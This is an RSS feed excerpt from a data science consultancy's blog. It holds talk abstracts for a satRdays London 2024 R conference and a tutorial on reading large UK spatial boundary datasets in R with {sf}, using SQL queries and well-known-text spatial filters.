&lt;p&gt;Quarto is an open-source scientific and technical publishing system that allows you to combine text with code to create fully reproducible documents in a variety of formats. The addition of custom styling to documents can make them look more professional and recognisable. In this talk, I&amp;rsquo;ll give an overview of ways to create customised PDF documents using Quarto. Until recently, this meant getting to grips with LaTeX. Now, there&amp;rsquo;s a new kid on the block: Typst. Typst is an open-source typesetting system that is designed to be as powerful as LaTeX while being much easier to learn and use.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Extensions are a powerful way to modify and extend the behaviour of Quarto, including adding styling to your documents with LaTeX or Typst. To demonstrate the differences between LaTeX and Typst, I’ll walk through the process of converting a LaTeX-based style extension to Typst, allowing users to easily switch between them. We’ll compare the two – discussing error messages (we all get them!), render time, and customisability along the way.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="matt-thomas---british-red-cross"&gt;&lt;a href="https://www.linkedin.com/in/matthewgthomas/" rel="external"&gt;Matt Thomas&lt;/a&gt; - &lt;a href="https://www.redcross.org.uk/" rel="external"&gt;British Red Cross&lt;/a&gt; &lt;img src="images/matt@2x.jpg" alt="Photo of Matt Thomas" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="where-data-meets-disaster-a-journey-through-the-british-red-crosss-humaniverse"&gt;Where data meets disaster: A journey through the British Red Cross’s &amp;lsquo;humaniverse&amp;rsquo;&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;The ‘Humaniverse’ is a suite of R packages produced by the British Red Cross’s data scientists for sharing humanitarian data and tools. Open data and analyses are vital for 21st Century humanitarianism and these packages have transformed the speed and scale at which we can provide answers about emerging and ongoing humanitarian crises in the UK. In this talk, I will offer an overview of the Humaniverse and will share some of the ways we have used this infrastructure to inform how the British Red Cross supports people affected by disasters, displacement, and health crises. I will cover our core R packages, discuss how and why we work in the open, demonstrate some of the analyses and apps we’ve built using this infrastructure, and share our ambitions for the future of the Humaniverse.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;div class="central-content"&gt;
&lt;a href="https://satrdays-london-2024.jumpingrivers.com/" class="buttony-link dark"&gt;Register Now &lt;i class="fa fa-angle-double-right"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/div&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-registration-closing/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Reading large spatial data</title><link>https://www.jumpingrivers.com/blog/large-spatial-data-r-sql/</link><pubDate>Thu, 04 Apr 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/large-spatial-data-r-sql/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/large-spatial-data-r-sql/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/large-spatial-data-r-sql/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;I love playing with spatial data. Perhaps it’s because I enjoy exploring
the outdoors, or because I spend hours playing
&lt;a href="https://www.geoguessr.com" rel="external"&gt;GeoGuessr&lt;/a&gt;, or maybe it’s just because maps
are &lt;em&gt;pretty&lt;/em&gt;, but there’s nothing more fun than tinkering with location
data.&lt;/p&gt;
&lt;p&gt;However, reading in spatial data, especially large data sets, can
sometimes be a pain. Here are some simple things to consider when
working with spatial data in R, including ways to break large data sets
into more manageable chunks.&lt;/p&gt;
&lt;h3 id="choose-the-right-resolution"&gt;Choose the right resolution&lt;/h3&gt;
&lt;p&gt;Before you even start playing with your data, ask yourself if you’ve got
the appropriate data set for the job. Spatial data can come in different
resolutions, and depending on the type of analysis or visualisation you
are doing, you might not need highly detailed boundaries. Choosing a
lower resolution at the cost of a little accuracy can massively reduce
file size and read times. Of course, you don’t always have the luxury
of choosing your data, but when you do, it can make a big difference.&lt;/p&gt;
&lt;p&gt;For example, I live in the UK so I often use the &lt;a href="https://geoportal.statistics.gov.uk" rel="external"&gt;Open Geography
portal&lt;/a&gt;. This is hosted by the
Office for National Statistics (ONS) and provides free and open access
to geographic data for the UK. The ONS provide boundaries for each
geography at full resolution and in generalised formats, which are
smoothed versions of the full boundaries. The full resolution is the
highest resolution available, which can result in very large file sizes.
&lt;a href="https://geoportal.statistics.gov.uk/datasets/ons::boundary-dataset-guidance-2021-onwards/about" rel="external"&gt;Generalised
formats&lt;/a&gt;
preserve much of the original detail but are much smaller in size,
providing a good compromise.&lt;/p&gt;
&lt;p&gt;For the types of visualisations I make, generalised data is sufficient.
As a small example, I downloaded the &lt;a href="https://geoportal.statistics.gov.uk/search?q=BDY_LSOA%20DEC_2021" rel="external"&gt;Lower layer Super Output Areas
datasets&lt;/a&gt; for England and Wales
with Full, Generalised and Super Generalised boundaries and recorded
the file size and read time for each. I also plotted the three different
resolutions with &lt;code&gt;geom_sf()&lt;/code&gt; so you can compare how they look.&lt;/p&gt;
&lt;table&gt;
&lt;caption&gt;File size and read times for various resolutions of the same
data set.&lt;/caption&gt;
&lt;thead&gt;
&lt;tr class="header"&gt;
&lt;th&gt;Resolution&lt;/th&gt;
&lt;th&gt;Generalised to&lt;/th&gt;
&lt;th&gt;File size&lt;/th&gt;
&lt;th&gt;Time to read&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr class="odd"&gt;
&lt;td&gt;Full&lt;/td&gt;
&lt;td&gt;0 m&lt;/td&gt;
&lt;td&gt;546 MB&lt;/td&gt;
&lt;td&gt;2 s&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td&gt;Generalised&lt;/td&gt;
&lt;td&gt;20 m&lt;/td&gt;
&lt;td&gt;50 MB&lt;/td&gt;
&lt;td&gt;750 ms&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="odd"&gt;
&lt;td&gt;Super generalised&lt;/td&gt;
&lt;td&gt;200 m&lt;/td&gt;
&lt;td&gt;16 MB&lt;/td&gt;
&lt;td&gt;620 ms&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-large-spatial-data"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;The full resolution file is more than 10 times bigger than the generalised one
(546 MB versus 50 MB), but visually it’s hard to see the difference between the boundaries.
Remember that higher resolution data sets will also take longer to
render when you plot them.&lt;/p&gt;
&lt;p align="center"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/large-spatial-data-r-sql/resolution.png" style="width:100%" alt="Three maps of Newcastle LSOAs with different boundary resolutions."/&gt;
&lt;/p&gt;
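&lt;p&gt;Figures like those in the table above can be collected with base R alone. The snippet below is a minimal sketch rather than the exact code used for the table: it assumes the small &lt;code&gt;nc.gpkg&lt;/code&gt; example file bundled with {sf} as a stand-in for the ONS downloads, so the numbers it reports will differ.&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;sf&amp;#34;)

# Assumption: the example GeoPackage shipped with {sf} stands in for a
# downloaded boundary file; swap in the path to your own data
path = system.file(&amp;#34;gpkg/nc.gpkg&amp;#34;, package = &amp;#34;sf&amp;#34;)

# File size in megabytes
size_mb = file.size(path) / 1024^2

# Time taken to read the whole file into memory
read_time = system.time({
  nc = st_read(path, quiet = TRUE)
})

size_mb
read_time[[&amp;#34;elapsed&amp;#34;]]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A single timing can be noisy, so repeating the read a few times gives a fairer comparison between resolutions.&lt;/p&gt;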
&lt;h3 id="read-only-what-you-need-with-sql-queries"&gt;Read only what you need with SQL queries&lt;/h3&gt;
&lt;p&gt;Sometimes you only need a subset of the data you’ve been given. Let’s
say I have data for England and Wales, but I only need the LSOAs in Wales. It’s
inefficient to load the entire data set only to immediately throw away
most of the rows. It makes much more sense to load into
memory only the rows that I need. In R, we use the &lt;code&gt;st_read()&lt;/code&gt; function from
{sf} to read spatial data. The &lt;code&gt;query&lt;/code&gt; argument of &lt;code&gt;st_read()&lt;/code&gt; lets
you read just part of the file into memory by using an SQL query to
filter the data on disk.&lt;/p&gt;
&lt;p&gt;The format of the query is &lt;code&gt;SELECT columns FROM layer WHERE condition&lt;/code&gt;.
So, to select all columns from my LSOA layer for rows whose code starts with “W”
(for Wales 🏴󠁧󠁢󠁷󠁬󠁳󠁿) we would use the following query.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;sf&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_read&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/Lower_layer_Super_Output_Areas_2021_EW_BGC_V3.gpkg&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; query &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;SELECT * FROM LSOA_2021_EW_BGC_V3 WHERE LSOA21CD LIKE &amp;#39;W%&amp;#39;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; quiet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Simple feature collection with 1917 features and 7 fields&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Geometry type: MULTIPOLYGON&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Dimension: XY&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Bounding box: xmin: 146615.2 ymin: 164586.3 xmax: 355312.8 ymax: 395982.3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Projected CRS: OSGB36 / British National Grid&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## First 10 features:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## LSOA21CD LSOA21NM BNG_E BNG_N LONG LAT&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 W01000003 Isle of Anglesey 001A 244606 393011 -4.33934 53.41098&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 W01000004 Isle of Anglesey 001B 242766 392434 -4.36671 53.40525&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 W01000005 Isle of Anglesey 005A 259172 377173 -4.11332 53.27280&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 W01000006 Isle of Anglesey 006A 240111 379172 -4.39991 53.28535&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 W01000007 Isle of Anglesey 009A 240423 370062 -4.39067 53.20362&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 W01000008 Isle of Anglesey 008A 253221 372359 -4.20027 53.22795&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 W01000009 Isle of Anglesey 007C 237013 376457 -4.44494 53.26002&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 W01000010 Isle of Anglesey 002A 250545 382806 -4.24524 53.32103&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 W01000011 Isle of Anglesey 008B 254994 372208 -4.17367 53.22708&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 W01000012 Isle of Anglesey 006B 246450 374976 -4.30288 53.24954&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## GlobalID SHAPE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 {C18AD6F8-CD89-453E-A34A-B9ACE9B58203} MULTIPOLYGON (((244811.2 39...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 {0ED47DC7-B1FE-4E63-84A6-995B701A39C0} MULTIPOLYGON (((241027.3 39...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 {EA47EE1B-C4F6-442F-B2F3-58EEA678DB1E} MULTIPOLYGON (((259509.4 37...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 {8FA5312C-C4CF-4B38-B7BD-44C824D15ED0} MULTIPOLYGON (((241039 3817...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 {A6509D8B-7C3D-4260-BA0F-BCECFFBEEA66} MULTIPOLYGON (((245072.1 37...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 {73F66A80-7EE7-4A98-899C-9702711DA427} MULTIPOLYGON (((253481.6 37...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 {7AB711C3-C230-4236-877B-8746ED3E1DCA} MULTIPOLYGON (((235911.7 37...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 {B5A77ECA-8CDC-4F82-B07E-3305622D1175} MULTIPOLYGON (((251300.9 38...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 {F7037CC7-D94A-4B6B-BEDA-7F02CF2CC5A5} MULTIPOLYGON (((256049.2 37...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 {A1A42AA3-FF44-4F13-9B60-82F9E7FB5681} MULTIPOLYGON (((246333.7 37...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here &lt;code&gt;*&lt;/code&gt; means SELECT all columns, and &lt;code&gt;LIKE&lt;/code&gt; is used to match strings
against a pattern in the &lt;a href="https://gdal.org/user/ogr_sql_dialect.html" rel="external"&gt;OGR SQL
dialect&lt;/a&gt;.&lt;/p&gt;
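&lt;p&gt;Replacing &lt;code&gt;*&lt;/code&gt; with a list of column names cuts down what is read even further. The following is a minimal sketch of that idea, assuming the &lt;code&gt;nc.shp&lt;/code&gt; example file bundled with {sf} (layer &lt;code&gt;nc&lt;/code&gt;, columns &lt;code&gt;NAME&lt;/code&gt; and &lt;code&gt;FIPS&lt;/code&gt;) in place of the LSOA data; &lt;code&gt;nc_a&lt;/code&gt; is just an illustrative name.&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;sf&amp;#34;)

# Assumption: example shapefile shipped with {sf}; its single layer is called nc
path = system.file(&amp;#34;shape/nc.shp&amp;#34;, package = &amp;#34;sf&amp;#34;)

# Read two attribute columns only, for counties whose name starts with A
nc_a = st_read(path,
  query = &amp;#34;SELECT NAME, FIPS FROM nc WHERE NAME LIKE &amp;#39;A%&amp;#39;&amp;#34;,
  quiet = TRUE)

names(nc_a)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For a shapefile the geometry comes back alongside the requested columns. For some formats, such as GeoPackage, you may need to list the geometry column (&lt;code&gt;SHAPE&lt;/code&gt; in the LSOA file) in the query explicitly.&lt;/p&gt;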
&lt;p&gt;But what if you don’t know the name of the layer you want to read in?
You can use &lt;code&gt;st_layers()&lt;/code&gt; to identify the layer(s) of interest without
reading in the entire data set.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_layers&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/Lower_layer_Super_Output_Areas_2021_EW_BGC_V3.gpkg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Driver: GPKG &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Available layers:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## layer_name geometry_type features fields&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 LSOA_2021_EW_BGC_V3 Multi Polygon 35672 7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## crs_name&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 OSGB36 / British National Grid&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;But what if you don’t know the names of your columns? You can look at
the first polygon only to get an idea about the structure without
loading the entire data set. Use the feature ID attribute to read
in only the first row of your data with &lt;code&gt;WHERE FID = 1&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_read&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/Lower_layer_Super_Output_Areas_2021_EW_BGC_V3.gpkg&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; query &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;SELECT * FROM LSOA_2021_EW_BGC_V3 WHERE FID = 1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; quiet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Simple feature collection with 1 feature and 7 fields&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Geometry type: MULTIPOLYGON&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Dimension: XY&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Bounding box: xmin: 531948.3 ymin: 181263.5 xmax: 532308.9 ymax: 182011.9&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Projected CRS: OSGB36 / British National Grid&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## LSOA21CD LSOA21NM BNG_E BNG_N LONG LAT&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 E01000001 City of London 001A 532123 181632 -0.09714 51.51816&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## GlobalID SHAPE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 {1A259A13-A525-4858-9CB0-E4952BA01AF6} MULTIPOLYGON (((532105.3 18...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This reads in only the first row of the data, which is LSOA &lt;code&gt;E01000001&lt;/code&gt;
in the City of London.&lt;/p&gt;
&lt;h3 id="spatial-filtering"&gt;Spatial filtering&lt;/h3&gt;
&lt;p&gt;In the last example, we filtered our data set before reading it into R by
using some of the metadata attached to our spatial polygons.
But what if you don’t have any columns that provide a useful filter?
You can also filter by the &lt;em&gt;spatial&lt;/em&gt; properties of your data. Let’s try
to read in only the Welsh LSOAs again, but this time using only their
spatial properties.&lt;/p&gt;
&lt;p&gt;First we need to create a polygon that we want our LSOAs to overlap
with. A boundary for Wales is available within the &lt;a href="https://geoportal.statistics.gov.uk/datasets/99ac6ae4ea4d42a9b0fff4171b7366db_0/explore?location=54.996612%2C-3.316942%2C6.11" rel="external"&gt;countries data set
on the Open
Geography portal&lt;/a&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(ggplot2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uk &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_read&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/Countries_December_2022_GB_BGC.gpkg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;wales &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(uk, CTRY22NM &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Wales&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We then turn that geometry into a &lt;em&gt;well-known text&lt;/em&gt; string. This is
simply a text representation of the polygon. We use &lt;code&gt;st_geometry()&lt;/code&gt; to
grab the geometry column of the data frame, and then &lt;code&gt;st_as_text()&lt;/code&gt; to
convert to a well-known text string.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;wales_wkt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; wales &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_geometry&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_as_text&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This well-known text is just a string defining the outline of the
polygon we want to use as our &lt;em&gt;bounding box&lt;/em&gt; (here Wales). It looks a
bit like this.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;quot;MULTIPOLYGON (((313022.3 384930.5, 312931.3 385007.4, 312644.5 38519.8, ...)))&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can then use that string in the &lt;code&gt;wkt_filter&lt;/code&gt; argument of &lt;code&gt;st_read()&lt;/code&gt;
to only read in LSOAs that overlap with the Wales polygon.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;wales_lsoa &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_read&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/Lower_layer_Super_Output_Areas_2021_EW_BGC_V3.gpkg&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; wkt_filter &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; wales_wkt)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p align="center"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/large-spatial-data-r-sql/wales.png" style="width:100%" alt="Left: An outline of Wales.
Right: A map of all the LSOAs that overlap with the polygon of Wales. There are some English LSOAs visible on the border. Cymru am byth."/&gt;
&lt;/p&gt;
